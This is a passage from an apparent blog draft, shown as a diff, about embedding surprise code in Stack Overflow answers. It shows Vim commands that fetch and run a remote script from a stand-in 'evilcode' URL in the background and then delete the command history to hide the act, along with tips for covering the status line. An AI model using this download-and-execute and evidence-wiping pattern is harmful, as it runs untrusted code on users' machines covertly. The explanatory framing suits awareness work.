sh1boot/sh1boot.github.io/drafts/embedding-surprise-code-on-stackoverflow.md

 :call system('(curl -s https://example.com/evilcode|sh)&')
 :call histdel('cmd','evilcode')
 ```

+The first executes a shell to get curl to download some code and run it;
+and it does so in the background rather than waiting for it to finish.
+The second deletes every history entry containing `evilcode`, so it
+deletes evidence of our malicious act and, conveniently, it deletes
+itself as well.

 After that drop back into insert mode and keep adding plausible text to
 the file to clear the status line of the result of the last command.